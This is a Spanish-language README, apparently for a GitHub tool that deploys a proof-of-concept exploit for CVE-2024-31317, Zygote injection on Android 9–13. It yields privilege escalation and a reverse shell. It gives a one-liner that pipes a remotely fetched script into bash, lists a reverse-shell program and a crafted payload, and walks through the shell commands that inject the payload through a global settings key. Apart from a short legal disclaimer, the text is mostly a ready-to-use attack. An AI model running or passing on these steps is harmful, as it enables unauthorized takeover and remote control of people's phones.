
Herramienta de despliegue automatizado para el PoC de CVE-2024-31317 en Android 9-13, que permite la escalada de privilegios mediante la inyección en Zygote y la ejecución de una shell inversa.
Una herramienta de despliegue para la prueba de concepto del exploit CVE-2024-31317 dirigido a dispositivos Android 9 a 13.
CVE-2024-31317-PoC-Deployer es un script de despliegue automatizado que genera y configura rápidamente todos los archivos necesarios para explotar la vulnerabilidad CVE-2024-31317. Esta vulnerabilidad afecta a dispositivos Android 9 a 13, permitiendo la escalada de privilegios y la ejecución de código arbitrario a través del proceso Zygote.
reverse_shell.c - Programa de shell inverso implementado en Cpayload.txt - Payload de exploit especialmente construidocompile.sh - Script de compilación automáticaREADME.txt - Instrucciones detalladas de usoCVE-2024-31317.txt - Documento de análisis técnico de la vulnerabilidadEjecutar el script de despliegue remoto:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
Compilar el shell inverso:
sh compile.sh
Ejecutar el listener del shell inverso:
sh reverse_shell
payload.txt a /data/local/tmp/ en el dispositivo objetivoxxx.xxx.xxx en payload.txt con la IP de tu servidor de escuchaam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
Esta herramienta está destinada únicamente para pruebas de seguridad legítimas e investigación. Se debe obtener autorización explícita del sistema objetivo antes de su uso. El uso no autorizado puede infringir la ley. El desarrollador no se hace responsable de ningún uso indebido.
Este proyecto está licenciado bajo la Licencia MIT - consulte el archivo LICENSE para más detalles.